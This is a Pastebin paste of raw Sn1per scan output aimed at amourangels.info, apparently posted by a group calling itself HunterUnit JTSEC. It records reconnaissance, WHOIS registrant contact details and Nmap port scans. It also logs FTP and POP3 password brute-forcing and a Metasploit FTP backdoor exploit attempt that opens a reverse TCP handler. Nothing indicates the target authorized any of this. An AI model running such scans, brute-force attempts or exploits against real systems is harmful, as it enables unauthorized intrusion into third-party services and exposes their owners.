Guest User

HunterUnit JTSEC amourangels.info full scan #1

a guest
Sep 26th, 2017
1,090
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 45.84 KB | None | 0 0
  1.  + -- --=[Sn1per v2.8 is available to download... To update, type "sniper update" 
  2.  ____ 
  3.  _________ / _/___ ___ _____
  4.  / ___/ __ \ / // __ \/ _ \/ ___/
  5.  (__ ) / / // // /_/ / __/ / 
  6.  /____/_/ /_/___/ .___/\___/_/ 
  7.  /_/ 
  8. 
  9.  + -- --=[http://crowdshield.com
  10.  + -- --=[sniper v2.7 by 1N3
  11. 
  12.  + -- ----------------------------=[Running Nslookup]=------------------------ -- +
  13. Server: 192.168.1.254
  14. Address: 192.168.1.254#53
  15.  
  16. Non-authoritative answer:
  17. Name: amourangels.info
  18. Address: 104.140.246.148
  19.  
  20. amourangels.info has address 104.140.246.148
  21. amourangels.info mail is handled by 0 amourangels.info.
  22.  + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
  23.  
  24. Xprobe2 v.0.3 Copyright (c) 2002-2005 [email protected], [email protected], [email protected]
  25.  
  26. [+] Target is amourangels.info
  27. [+] Loading modules.
  28. [+] Following modules are loaded:
  29. [x] [1] ping:icmp_ping - ICMP echo discovery module
  30. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  31. [x] [3] ping:udp_ping - UDP-based ping discovery module
  32. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  33. [x] [5] infogather:portscan - TCP and UDP PortScanner
  34. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  35. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  36. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  37. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  38. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  39. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  40. [x] [12] fingerprint:smb - SMB fingerprinting module
  41. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  42. [+] 13 modules registered
  43. [+] Initializing scan engine
  44. [+] Running scan engine
  45. [-] ping:tcp_ping module: no closed/open TCP ports known on 104.140.246.148. Module test failed
  46. [-] ping:udp_ping module: no closed/open UDP ports known on 104.140.246.148. Module test failed
  47. [-] No distance calculation. 104.140.246.148 appears to be dead or no ports known
  48. [+] Host: 104.140.246.148 is up (Guess probability: 50%)
  49. [+] Target: 104.140.246.148 is alive. Round-Trip Time: 1.01964 sec
  50. [+] Selected safe Round-Trip Time value is: 2.03928 sec
  51. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
  52. [-] fingerprint:smb need either TCP port 139 or 445 to run
  53. [+] Primary guess:
  54. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  55. [+] Other guesses:
  56. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  57. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  58. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  59. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  60. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  61. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  62. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  63. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  64. [+] Host 104.140.246.148 Running OS: À¢7ë-V (Guess probability: 100%)
  65. [+] Cleaning up scan engine
  66. [+] Modules deinitialized
  67. [+] Execution completed.
  68.  + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
  69. Domain Name: AMOURANGELS.INFO
  70. Registry Domain ID: D53470519-LRMS
  71. Registrar WHOIS Server:
  72. Registrar URL: http://www.CrazyDomains.com
  73. Updated Date: 2017-09-20T21:10:20Z
  74. Creation Date: 2014-09-08T12:30:01Z
  75. Registry Expiry Date: 2019-09-08T12:30:01Z
  76. Registrar Registration Expiration Date:
  77. Registrar: Crazy Domains FZ-LLC
  78. Registrar IANA ID: 1291
  79. Registrar Abuse Contact Email:
  80. Registrar Abuse Contact Phone:
  81. Reseller:
  82. Domain Status: ok https://icann.org/epp#ok
  83. Registry Registrant ID: C154844480-LRMS
  84. Registrant Name: Kam Media
  85. Registrant Organization:
  86. Registrant Street: 20 Boulevard
  87. Registrant City: Paris
  88. Registrant State/Province: Paris
  89. Registrant Postal Code: 75012
  90. Registrant Country: FR
  91. Registrant Phone: +33.327723445
  92. Registrant Phone Ext:
  93. Registrant Fax:
  94. Registrant Fax Ext:
  95. Registrant Email: [email protected]
  96. Registry Admin ID: C154844478-LRMS
  97. Admin Name: Kam Media
  98. Admin Organization:
  99. Admin Street: 20 Boulevard
  100. Admin City: Paris
  101. Admin State/Province: Paris
  102. Admin Postal Code: 75012
  103. Admin Country: FR
  104. Admin Phone: +33.327723445
  105. Admin Phone Ext:
  106. Admin Fax:
  107. Admin Fax Ext:
  108. Admin Email: [email protected]
  109. Registry Tech ID: C154844478-LRMS
  110. Tech Name: Kam Media
  111. Tech Organization:
  112. Tech Street: 20 Boulevard
  113. Tech City: Paris
  114. Tech State/Province: Paris
  115. Tech Postal Code: 75012
  116. Tech Country: FR
  117. Tech Phone: +33.327723445
  118. Tech Phone Ext:
  119. Tech Fax:
  120. Tech Fax Ext:
  121. Tech Email: [email protected]
  122. Registry Billing ID: C154844478-LRMS
  123. Billing Name: Kam Media
  124. Billing Organization:
  125. Billing Street: 20 Boulevard
  126. Billing City: Paris
  127. Billing State/Province: Paris
  128. Billing Postal Code: 75012
  129. Billing Country: FR
  130. Billing Phone: +33.327723445
  131. Billing Phone Ext:
  132. Billing Fax:
  133. Billing Fax Ext:
  134. Billing Email: [email protected]
  135. Name Server: NS1.SMILESERVE.COM
  136. Name Server: NS2.SMILESERVE.COM
  137. DNSSEC: unsigned
  138. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
  139. >>> Last update of WHOIS database: 2017-09-26T21:29:31Z <<<
  140.  
  141. For more information on Whois status codes, please visit https://icann.org/epp
  142.  
  143. Access to AFILIAS WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the Afilias registry database. The data in this record is provided by Afilias Limited for informational purposes only, and Afilias does not guarantee its accuracy. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to(a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Afilias except as reasonably necessary to register domain names or modify existing registrations. All rights reserved. Afilias reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
  144.  + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
  145.  
  146. *******************************************************************
  147. * *
  148. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
  149. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
  150. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
  151. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
  152. * *
  153. * TheHarvester Ver. 2.7 *
  154. * Coded by Christian Martorella *
  155. * Edge-Security Research *
  156. *******************************************************************
  157.  
  158.  
  159. [-] Searching in Bing:
  160.  + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
  161.  
  162. ; <<>> DiG 9.10.3-P4-Debian <<>> -x amourangels.info
  163. ;; global options: +cmd
  164. ;; Got answer:
  165. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 62196
  166. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  167.  
  168. ;; OPT PSEUDOSECTION:
  169. ; EDNS: version: 0, flags:; udp: 4096
  170. ;; QUESTION SECTION:
  171. ;info.amourangels.in-addr.arpa. IN PTR
  172.  
  173. ;; AUTHORITY SECTION:
  174. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017043180 1800 900 604800 3600
  175.  
  176. ;; Query time: 37 msec
  177. ;; SERVER: 192.168.1.254#53(192.168.1.254)
  178. ;; WHEN: Tue Sep 26 17:30:33 EDT 2017
  179. ;; MSG SIZE rcvd: 126
  180.  
  181. dnsenum VERSION:1.2.4
  182. 
  183. ----- amourangels.info -----
  184. 
  185.  
  186. Host's addresses:
  187. __________________
  188.  
  189. amourangels.info. 14234 IN A 104.140.246.148
  190. 
  191.  
  192. Name Servers:
  193. ______________
  194.  
  195. ns2.smileserve.com. 14234 IN A 104.140.246.148
  196. ns1.smileserve.com. 14234 IN A 104.140.246.148
  197. 
  198.  
  199. Mail (MX) Servers:
  200. ___________________
  201.  
  202. amourangels.info. 14234 IN A 104.140.246.148
  203. 
  204.  
  205. Trying Zone Transfers and getting Bind Versions:
  206. _________________________________________________
  207.  
  208. 
  209. Trying Zone Transfer for amourangels.info on ns2.smileserve.com ...
  210.  
  211. Trying Zone Transfer for amourangels.info on ns1.smileserve.com ...
  212.  
  213. brute force file not specified, bay.
  214.  + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
  215. 
  216. ____ _ _ _ _ _____
  217. / ___| _ _| |__ | (_)___| |_|___ / _ __
  218. \___ \| | | | '_ \| | / __| __| |_ \| '__|
  219. ___) | |_| | |_) | | \__ \ |_ ___) | |
  220. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
  221.  
  222. # Coded By Ahmed Aboul-Ela - @aboul3la
  223.  
  224. [-] Enumerating subdomains now for amourangels.info
  225. [-] verbosity is enabled, will show the subdomains results in realtime
  226. [-] Searching now in Baidu..
  227. [-] Searching now in Yahoo..
  228. [-] Searching now in Google..
  229. [-] Searching now in Bing..
  230. [-] Searching now in Ask..
  231. [-] Searching now in Netcraft..
  232. [-] Searching now in DNSdumpster..
  233. [-] Searching now in Virustotal..
  234. [-] Searching now in ThreatCrowd..
  235. [-] Searching now in SSL Certificates..
  236. [-] Searching now in PassiveDNS..
  237. SSL Certificates: cpanel.amourangels.info
  238. SSL Certificates: mail.amourangels.info
  239. SSL Certificates: webdisk.amourangels.info
  240. SSL Certificates: webmail.amourangels.info
  241. SSL Certificates: www.amourangels.info
  242. Virustotal: www.amourangels.info
  243. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-amourangels.info.txt
  244. [-] Total Unique Subdomains Found: 5
  245. www.amourangels.info
  246. cpanel.amourangels.info
  247. mail.amourangels.info
  248. webdisk.amourangels.info
  249. webmail.amourangels.info
  250.  
  251.  ╔═╗╦═╗╔╦╗╔═╗╦ ╦
  252.  ║ ╠╦╝ ║ ╚═╗╠═╣
  253.  ╚═╝╩╚═ ╩o╚═╝╩ ╩
  254.  + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
  255. 
  256. *.amourangels.info
  257. cpanel.amourangels.info
  258. mail.amourangels.info
  259. webdisk.amourangels.info
  260. webmail.amourangels.info
  261. www.amourangels.info
  262.  [+] Domains saved to: /usr/share/sniper/loot/domains/domains-amourangels.info-full.txt
  263. 
  264.  + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
  265.  + -- ----------------------------=[Checking Email Security]=----------------- -- +
  266.  
  267.  + -- ----------------------------=[Pinging host]=---------------------------- -- +
  268. PING amourangels.info (104.140.246.148) 56(84) bytes of data.
  269. 64 bytes from ns1.dating-club2007.club (104.140.246.148): icmp_seq=1 ttl=53 time=180 ms
  270.  
  271. --- amourangels.info ping statistics ---
  272. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  273. rtt min/avg/max/mdev = 180.089/180.089/180.089/0.000 ms
  274.  
  275.  + -- ----------------------------=[Running TCP port scan]=------------------- -- +
  276.  
  277. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:31 EDT
  278. Nmap scan report for amourangels.info (104.140.246.148)
  279. Host is up (2.1s latency).
  280. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  281. Not shown: 43 filtered ports, 1 closed port
  282. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  283. PORT STATE SERVICE
  284. 21/tcp open ftp
  285. 22/tcp open ssh
  286. 110/tcp open pop3
  287. 443/tcp open https
  288. 3306/tcp open mysql
  289.  
  290. Nmap done: 1 IP address (1 host up) scanned in 3.23 seconds
  291.  
  292.  + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
  293.  + -- --=[Port 21 opened... running tests...
  294.  
  295. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:31 EDT
  296. Nmap scan report for amourangels.info (104.140.246.148)
  297. Host is up (0.28s latency).
  298. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  299.  
  300. PORT STATE SERVICE VERSION
  301. 21/tcp open ftp Pure-FTPd
  302. | ftp-brute:
  303. | Accounts: No valid accounts found
  304. |_ Statistics: Performed 2397 guesses in 184 seconds, average tps: 13.9
  305. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  306. Device type: general purpose
  307. Running: Linux 2.6.X
  308. OS CPE: cpe:/o:linux:linux_kernel:2.6.39
  309. OS details: Linux 2.6.39
  310. Network Distance: 20 hops
  311.  
  312. TRACEROUTE (using port 21/tcp)
  313. HOP RTT ADDRESS
  314. 1 272.47 ms 10.13.0.1
  315. 2 276.93 ms 37.187.24.252
  316. 3 280.41 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
  317. 4 ...
  318. 5 299.36 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
  319. 6 284.72 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
  320. 7 305.08 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
  321. 8 288.38 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
  322. 9 341.60 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
  323. 10 352.35 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
  324. 11 180.89 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
  325. 12 186.10 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
  326. 13 196.49 ms ae10.mpr4.lga7.us.zip.zayo.com (64.125.20.81)
  327. 14 193.16 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
  328. 15 189.62 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
  329. 16 191.75 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
  330. 17 183.31 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
  331. 18 182.30 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
  332. 19 180.11 ms exponentiation.approvalbureau.com (104.140.201.114)
  333. 20 180.26 ms ns1.dating-club2007.club (104.140.246.148)
  334.  
  335. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  336. Nmap done: 1 IP address (1 host up) scanned in 198.39 seconds
  337. 
  338. ______________________________________________________________________________
  339. | |
  340. | METASPLOIT CYBER MISSILE COMMAND V4 |
  341. |______________________________________________________________________________|
  342. \ / /
  343. \ . / / x
  344. \ / /
  345. \ / + /
  346. \ + / /
  347. * / /
  348. / . /
  349. X / / X
  350. / ###
  351. / # % #
  352. / ###
  353. . /
  354. . / . * .
  355. /
  356. *
  357. + *
  358.  
  359. ^
  360. #### __ __ __ ####### __ __ __ ####
  361. #### / \ / \ / \ ########### / \ / \ / \ ####
  362. ################################################################################
  363. ################################################################################
  364. # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
  365. ################################################################################
  366. https://metasploit.com
  367. 
  368.  
  369. =[ metasploit v4.16.8-dev ]
  370. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
  371. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  372. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  373.  
  374. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
  375. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
  376. [-] Unknown command: “spool.
  377. RHOST => amourangels.info
  378. RHOSTS => amourangels.info
  379. [*] amourangels.info:21 - Banner: 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
  380. 220-You are user number 1 of 50 allowed.
  381. 220-Local time is now 17:34. Server port: 21.
  382. 220-This is a private system - No anonymous login
  383. 220-IPv6 connections are also welcome on this server.
  384. 220 You will be disconnected after 15 minutes of inactivity.
  385. [*] amourangels.info:21 - USER: 331 User X:) OK. Password required
  386. [*] Exploit completed, but no session was created.
  387. [*] Started reverse TCP double handler on 10.13.0.222:4444
  388. [*] amourangels.info:21 - Sending Backdoor Command
  389. [*] Exploit completed, but no session was created.
  390.  + -- --=[Port 22 opened... running tests...
  391. [exception] did not receive banner.
  392.  
  393. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:34 EDT
  394. Nmap scan report for amourangels.info (104.140.246.148)
  395. Host is up (0.18s latency).
  396. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  397.  
  398. PORT STATE SERVICE VERSION
  399. 22/tcp filtered ssh
  400. Too many fingerprints match this host to give specific OS details
  401. Network Distance: 20 hops
  402.  
  403. TRACEROUTE (using proto 1/icmp)
  404. HOP RTT ADDRESS
  405. 1 110.99 ms 10.13.0.1
  406. 2 111.63 ms 37.187.24.252
  407. 3 111.61 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
  408. 4 113.37 ms 10.95.33.8
  409. 5 114.60 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
  410. 6 115.16 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
  411. 7 115.20 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
  412. 8 114.66 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
  413. 9 181.90 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
  414. 10 181.46 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
  415. 11 180.87 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
  416. 12 181.68 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
  417. 13 ...
  418. 14 181.69 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
  419. 15 180.34 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
  420. 16 180.36 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
  421. 17 192.04 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
  422. 18 183.32 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
  423. 19 179.78 ms exponentiation.approvalbureau.com (104.140.201.114)
  424. 20 180.73 ms ns1.dating-club2007.club (104.140.246.148)
  425.  
  426. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  427. Nmap done: 1 IP address (1 host up) scanned in 13.46 seconds
  428. 
  429. . .
  430. .
  431.  
  432. dBBBBBBb dBBBP dBBBBBBP dBBBBBb . o
  433.  ' dB' BBP
  434. dB'dB'dB' dBBP dBP dBP BB
  435. dB'dB'dB' dBP dBP dBP BB
  436. dB'dB'dB' dBBBBP dBP dBBBBBBB
  437.  
  438. dBBBBBP dBBBBBb dBP dBBBBP dBP dBBBBBBP
  439. . . dB' dBP dB'.BP
  440. | dBP dBBBB' dBP dB'.BP dBP dBP
  441. --o-- dBP dBP dBP dB'.BP dBP dBP
  442. | dBBBBP dBP dBBBBP dBBBBP dBP dBP
  443.  
  444. .
  445. .
  446. o To boldly go where no
  447. shell has gone before
  448. 
  449.  
  450. =[ metasploit v4.16.8-dev ]
  451. + -- --=[ 1684 exploits - 964 auxiliary - 299 post ]
  452. + -- --=[ 498 payloads - 40 encoders - 10 nops ]
  453. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  454.  
  455. [*] Processing /root/.msf4/msfconsole.rc for ERB directives.
  456. resource (/root/.msf4/msfconsole.rc)> “spool /root/msf_console.log”
  457. [-] Unknown command: “spool.
  458. USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
  459. RHOSTS => amourangels.info
  460. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  461. RHOST => amourangels.info
  462. [*] 104.140.246.148:22 - SSH - Checking for false positives
  463. [-] 104.140.246.148:22 - SSH - throws false positive results. Aborting.
  464. [*] Scanned 1 of 1 hosts (100% complete)
  465. [*] Auxiliary module execution completed
  466. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
  467. [+] 104.140.246.148:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.protocol=ssh fingerprint_db=ssh.banner )
  468. [*] amourangels.info:22 - Scanned 1 of 1 hosts (100% complete)
  469. [*] Auxiliary module execution completed
  470.  + -- --=[Port 23 closed... skipping.
  471.  + -- --=[Port 25 closed... skipping.
  472.  + -- --=[Port 53 closed... skipping.
  473.  + -- --=[Port 79 closed... skipping.
  474.  + -- --=[Port 80 closed... skipping.
  475.  + -- --=[Port 110 opened... running tests...
  476.  
  477. Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-26 17:35 EDT
  478. Nmap scan report for amourangels.info (104.140.246.148)
  479. Host is up (0.18s latency).
  480. rDNS record for 104.140.246.148: ns1.dating-club2007.club
  481.  
  482. PORT STATE SERVICE VERSION
  483. 110/tcp open pop3 Dovecot pop3d
  484. | pop3-brute:
  485. | Accounts: No valid accounts found
  486. |_ Statistics: Performed 185 guesses in 195 seconds, average tps: 0.9
  487. |_pop3-capabilities: STLS AUTH-RESP-CODE RESP-CODES PIPELINING USER TOP SASL(PLAIN LOGIN) UIDL CAPA
  488. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  489. Device type: general purpose
  490. Running: Linux 2.6.X
  491. OS CPE: cpe:/o:linux:linux_kernel:2.6.39
  492. OS details: Linux 2.6.39
  493. Network Distance: 20 hops
  494.  
  495. TRACEROUTE (using port 110/tcp)
  496. HOP RTT ADDRESS
  497. 1 522.26 ms 10.13.0.1
  498. 2 530.92 ms 37.187.24.252
  499. 3 526.46 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
  500. 4 ...
  501. 5 537.91 ms be100-1107.ldn-1-a9.uk.eu (91.121.215.179)
  502. 6 534.41 ms ge-3-3-0.mpr1.lhr3.uk.above.net (195.66.236.76)
  503. 7 544.14 ms ae6.mpr3.lhr3.uk.zip.zayo.com (64.125.21.21)
  504. 8 554.41 ms ae12.mpr2.lhr2.uk.zip.zayo.com (64.125.28.21)
  505. 9 768.91 ms ae27.cs1.lhr11.uk.eth.zayo.com (64.125.30.236)
  506. 10 779.44 ms ae5.cs1.lga5.us.eth.zayo.com (64.125.29.126)
  507. 11 478.92 ms ae27.cr1.lga5.us.zip.zayo.com (64.125.30.251)
  508. 12 486.24 ms ae1.cr2.lga5.us.zip.zayo.com (64.125.29.38)
  509. 13 482.45 ms ae10.mpr4.lga7.us.zip.zayo.com (64.125.20.81)
  510. 14 509.85 ms ae1.mpr2.lga7.us.zip.zayo.com (64.125.20.125)
  511. 15 509.78 ms 64.124.193.85.IPYX-076763-001-ZYO.above.net (64.124.193.85)
  512. 16 499.68 ms cs49.cs30.jfk.nyinternet.net (64.147.125.190)
  513. 17 489.53 ms 66.111.3.30.static.nyinternet.net (66.111.3.30)
  514. 18 277.03 ms xe-0-1-0.nyc1-100.nyc1.serverhub.com (104.140.200.33)
  515. 19 266.90 ms exponentiation.approvalbureau.com (104.140.201.114)
  516. 20 180.03 ms ns1.dating-club2007.club (104.140.246.148)
  517.  
  518. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  519. Nmap done: 1 IP address (1 host up) scanned in 208.72 seconds
  520.  + -- --=[Port 111 closed... skipping.
  521.  + -- --=[Port 135 closed... skipping.
  522.  + -- --=[Port 139 closed... skipping.
  523.  + -- --=[Port 161 closed... skipping.
  524.  + -- --=[Port 162 closed... skipping.
  525.  + -- --=[Port 389 closed... skipping.
  526.  + -- --=[Port 443 opened... running tests...
  527.  + -- ----------------------------=[Checking for WAF]=------------------------ -- +
  528.  
  529. ^ ^
  530. _ __ _ ____ _ __ _ _ ____
  531. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
  532. | V V // o // _/ | V V // 0 // 0 // _/
  533. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
  534. <
  535. ...'
  536.  
  537. WAFW00F - Web Application Firewall Detection Tool
  538.  
  539. By Sandro Gauci && Wendel G. Henrique
  540.  
  541. Checking https://amourangels.info
  542. Generic Detection results:
  543. No WAF detected by the generic detection
  544. Number of requests: 13
  545.  
  546.  + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +
  547. ____ _ _ _____ _ _
  548. / ___| | ___ _ _ __| | ___|_ _(_) |
  549. | | | |/ _ \| | | |/ _` | |_ / _` | | |
  550. | |___| | (_) | |_| | (_| | _| (_| | | |
  551. \____|_|\___/ \__,_|\__,_|_| \__,_|_|_|
  552. v1.0.1 by m0rtem
  553.  
  554.  
  555. [17:39:52] Initializing CloudFail - the date is: 26/09/2017
  556. [17:39:52] Fetching initial information from: amourangels.info...
  557. [17:39:52] Server IP: 104.140.246.148
  558. [17:39:52] Testing if amourangels.info is on the Cloudflare network...
  559. [17:39:52] amourangels.info is not part of the Cloudflare network, quitting...
  560.  + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
  561. https://amourangels.info [200 OK] Country[UNITED STATES][US], HTTPServer[LiteSpeed], IP[104.140.246.148], LiteSpeed, Script[text/javascript], Title[Amour Angels], UncommonHeaders[alt-svc]
  562.  
  563.  + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +
  564.  
  565.  
  566.  
  567. AVAILABLE PLUGINS
  568. -----------------
  569.  
  570. PluginSessionResumption
  571. PluginOpenSSLCipherSuites
  572. PluginCertInfo
  573. PluginHSTS
  574. PluginHeartbleed
  575. PluginCompression
  576. PluginChromeSha1Deprecation
  577. PluginSessionRenegotiation
  578.  
  579.  
  580.  
  581. CHECKING HOST(S) AVAILABILITY
  582. -----------------------------
  583.  
  584. amourangels.info:443 => 104.140.246.148:443
  585.  
  586.  
  587.  
  588. SCAN RESULTS FOR AMOURANGELS.INFO:443 - 104.140.246.148:443
  589. -----------------------------------------------------------
  590.  
  591. * Deflate Compression:
  592. OK - Compression disabled
  593.  
  594. * Session Renegotiation:
  595. Client-initiated Renegotiations: OK - Rejected
  596. Secure Renegotiation: OK - Supported
  597.  
  598. * SSLV3 Cipher Suites:
  599. Server rejected all cipher suites.
  600.  
  601. * SSLV2 Cipher Suites:
  602. Server rejected all cipher suites.
  603.  
  604. * Certificate - Content:
  605. SHA1 Fingerprint: aede924f1243327142e7b33ad2f03010b9390d4c
  606. Common Name: amourangels.info
  607. Issuer: cPanel, Inc. Certification Authority
  608. Serial Number: 488B5892E01C2B2457CD629A118352AD
  609. Not Before: Sep 21 00:00:00 2017 GMT
  610. Not After: Dec 20 23:59:59 2017 GMT
  611. Signature Algorithm: sha256WithRSAEncryption
  612. Public Key Algorithm: rsaEncryption
  613. Key Size: 2048 bit
  614. Exponent: 65537 (0x10001)
  615. X509v3 Subject Alternative Name: {'DNS': ['amourangels.info', 'autodiscover.amourangels.info', 'cpanel.amourangels.info', 'mail.amourangels.info', 'webdisk.amourangels.info', 'webmail.amourangels.info', 'www.amourangels.info']}
  616.  
  617. * Certificate - Trust:
  618. Hostname Validation: OK - Subject Alternative Name matches
  619. Google CA Store (09/2015): OK - Certificate is trusted
  620. Java 6 CA Store (Update 65): OK - Certificate is trusted
  621. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
  622. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
  623. Microsoft CA Store (09/2015): ERROR: timeout - timed out
  624. Certificate Chain Received: ['amourangels.info', 'cPanel, Inc. Certification Authority', 'COMODO RSA Certification Authority']
  625.  
  626. * Certificate - OCSP Stapling:
  627. OCSP Response Status: successful
  628. Validation w/ Mozilla's CA Store: OK - Response is trusted
  629. Responder Id: 7E035A65416BA77E0AE1B89D08EA1D8E1D6AC765
  630. Cert Status: good
  631. Cert Serial Number: 488B5892E01C2B2457CD629A118352AD
  632. This Update: Sep 25 17:45:04 2017 GMT
  633. Next Update: Oct 2 17:45:04 2017 GMT
  634.  
  635. * Session Resumption:
  636. With Session IDs: PARTIALLY SUPPORTED (4 successful, 0 failed, 1 errors, 5 total attempts). Try --resum_rate.
  637. ERROR #1: timeout - timed out
  638. With TLS Session Tickets: NOT SUPPORTED - TLS ticket not assigned.
  639.  
  640.  
  641.  
  642. SCAN COMPLETED IN 30.28 S
  643. -------------------------
  644. Version: 1.11.10-static
  645. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  646. 
  647. Testing SSL server amourangels.info on port 443 using SNI name amourangels.info
  648.  
  649. TLS Fallback SCSV:
  650. Server does not support TLS Fallback SCSV
  651.  
  652. TLS renegotiation:
  653. Secure session renegotiation supported
  654.  
  655. TLS Compression:
  656. Compression disabled
  657.  
  658. Heartbleed:
  659. TLS 1.2 not vulnerable to heartbleed
  660. TLS 1.1 not vulnerable to heartbleed
  661. TLS 1.0 not vulnerable to heartbleed
  662.  
  663. Supported Server Cipher(s):
